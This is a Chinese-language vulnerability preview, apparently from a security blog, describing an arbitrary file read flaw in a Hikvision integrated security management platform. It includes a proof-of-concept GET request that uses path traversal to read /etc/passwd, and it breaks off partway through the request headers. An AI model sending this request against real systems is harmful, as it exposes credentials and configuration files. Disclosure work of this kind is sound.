文章预览
网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。 海康威视综合安防系统/center/api/task/..;/orgManage/v1/orgs/download接口存在任意文件读取漏洞,攻击者可以利用漏洞读取服务器上的任意文件,包括配置文件、账号密码等敏感信息。 0x02影响版本 海康威视综合安防平台 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现 POC (GET) 漏洞复现 GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecur
………………………………
